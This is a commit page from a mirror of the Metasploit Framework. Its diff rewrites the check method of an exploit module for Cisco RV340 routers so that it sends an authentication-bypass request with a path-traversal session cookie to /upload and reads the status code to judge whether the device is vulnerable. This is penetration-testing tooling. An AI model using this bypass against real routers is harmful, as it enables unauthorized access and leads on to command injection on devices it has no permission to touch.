dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Rewrote check method to only abuse authentication bypass. Added additional status checks.

This commit is contained in:
Stephen Wildow 2023-02-11 17:43:33 -05:00
parent 036ed7f467
commit 79b1801a4f
No known key found for this signature in database
GPG Key ID: 3D8ACAD402C22B27
1 changed files with 27 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
modules/exploits/linux/http/cisco_rv340_lan.rb
View File

@ -88,22 +88,35 @@ class MetasploitModule < Msf::Exploit::Remote
) )
end end
# sessionid utilized later needs to be set to length
# of 16 or exploit will fail. Tested with lengths
# 14-17
def generate_session_id
return Rex::Text.rand_text_alphanumeric(16)
end
def check def check
# Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce res = send_request_cgi({
# Test to see if router is responding and possibly vulnerable 'method' => 'GET',
res = send_exploit('id') 'uri' => '/upload',
'headers' => {
'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
}
}, 10)
return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil? # A proper "upload" will trigger file creation. So created above is an incorrect "upload" call to avoid file
# creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
# Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation # The firmware containing this authentication bypass also contains the command injection vulnerability that will be
return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403 # abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
if res.nil?
# Vulnerable versions will respond with 301 Moved Permanently in body of response return CheckCode::Unknown('The device did not respond to request packet.')
if res.body.include?('<head><title>301 Moved Permanently</title></head>') elsif !res.nil? && res.code == 405
return CheckCode::Appears('The device responded to exploitation with a 200 OK.') return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
elsif res.code == 403
return CheckCode::Safe('The device is not vulnerable to exploitation.')
else # Catch-all
return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
end end
CheckCode::Safe('The target did not respond with an expected payload.')
end end
def execute_command(cmd, _opts = {}) def execute_command(cmd, _opts = {})
@ -116,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
if target['Type'] == :linux_dropper if target['Type'] == :linux_dropper
fail_with(Failure::Unreachable, 'The target did not respond') unless res
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
begin begin
body_json = res.get_json_document body_json = res.get_json_document